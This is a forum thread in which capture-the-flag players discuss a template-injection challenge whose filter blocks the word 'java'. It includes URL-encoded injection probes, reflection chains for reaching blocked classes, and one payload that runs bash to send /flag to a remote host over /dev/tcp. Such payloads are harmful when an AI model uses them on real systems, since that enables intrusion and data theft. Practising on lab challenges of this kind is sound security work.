The creator of the challenge forgot to delete the original flag 
how? whatever payload i am using i am only getting 400 bad request.
Url encode all characters
Your payload contains the blacklisted word java. You need to bypass the filter. Check resources I sent in this thread. There are bypass examples in one of them.
@Hex can “java” be bypassed by using the LIBS like “Java.lang.Runtime”
in this article
WAF Bypassed
the bash command have been used
Thanks alot 4 this Java REV SHELL
I don’t think you can bypass it with Java because it compares the input after converting to lowercase. Instead, you need string manipulation.
i am trying __*%24%7bRuntime.getRuntime().exec(%22bash%20-c%20cat%24%7bIFS%7d%2fflag*%3e%26%2fdev%2ftcp%2f172.20.10.2%2f1234%3c%261)%22%7d__%3a%3a.x from the https://github.com/welk1n/ReverseShell-Java and getting 500 whitelabel error…
Because you can’t reach directly to the Runtime class.
This site demonstrates a creative way of calling java.lang.Runtime as a string, allowing you to perform string manipulation
Check how java is being detected, bypass is simpler then you might think
This simple payload __*${7*7}__::.x url enc should result in 49 but does not work and only returns 500.
GET /?lang=%5f%5f%2a%24%7b%37%2a%37%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Are there any links to this topic? java.io.File 3 has the listFiles method to retrieve file names. java.nio.Files has the readAllLines method. Because without a public ip, a reverse shell is not possible.
Try __${7*7}__::.x encoded as %5F%5F%24%7B7%2A7%7D%5F%5F%3A%3A%2Ex. You should see a 49 returned.
Thank’s … that was the mistake.
Have you found a way without reverse shell (no public ip)?
I tried those but couldn’t create a proper payload to read the flag without a reverse shell.
Java is very picky about what objects it recieves, if you get that right you’ll make methods work.
For example: readAllLines doesnt like String, it wants Paths object (java.nio.file.Paths)
Also pay attention to method types, static methods don’t need object instance while non-static do.
I still dont understand if its possible to create instance of objects, dont know if i can use non-static methods
The idea is similar to Python, but with more Java f#*kery 
My Java knowledge is not in depth, just basics. Sorry if the hints are terrible. Simple objects is definetly possible, not sure about chaining different objects.
To create object instance like: ''.getClass().forName(someClassName).getConstructor(someClassObject).newInstance(constructorArg).method(methodArg)
For static like:''.getClass().forName(someClassName).method(arg)
nevermind i got it, thank you for the hints
1 Like
I try bypass filter “java” but no happen. Can you help me?
Please show what you have done so we can help you here